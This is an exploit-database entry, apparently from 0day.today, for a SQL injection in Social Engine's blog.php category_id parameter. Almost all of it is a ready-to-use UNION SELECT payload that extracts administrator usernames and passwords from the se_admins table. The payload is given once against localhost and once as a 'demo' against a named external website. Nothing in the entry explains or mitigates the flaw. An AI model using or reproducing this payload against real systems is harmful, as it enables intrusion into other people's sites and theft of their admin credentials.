id: 4750
date: 01/28/2009
title: Social Engine (category_id) SQL Injection Vulnerability
author: Snakespc
cves: 

=======================================================
Social Engine (category_id) SQL Injection Vulnerability
=======================================================



Exploit:
http://localhost/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
********
demo:
http://www.socialenginedev.com/blog.php?user=darkthronex&category_id=-5+UNION SELECT 1,2,3,4,5,concat(admin_username,0x3a,admin_password),7,8,9,10,11,12,13,14,15,16,17,18+from+se_admins/*
=======================================================================================================================




#  0day.today [2023-03-21]  #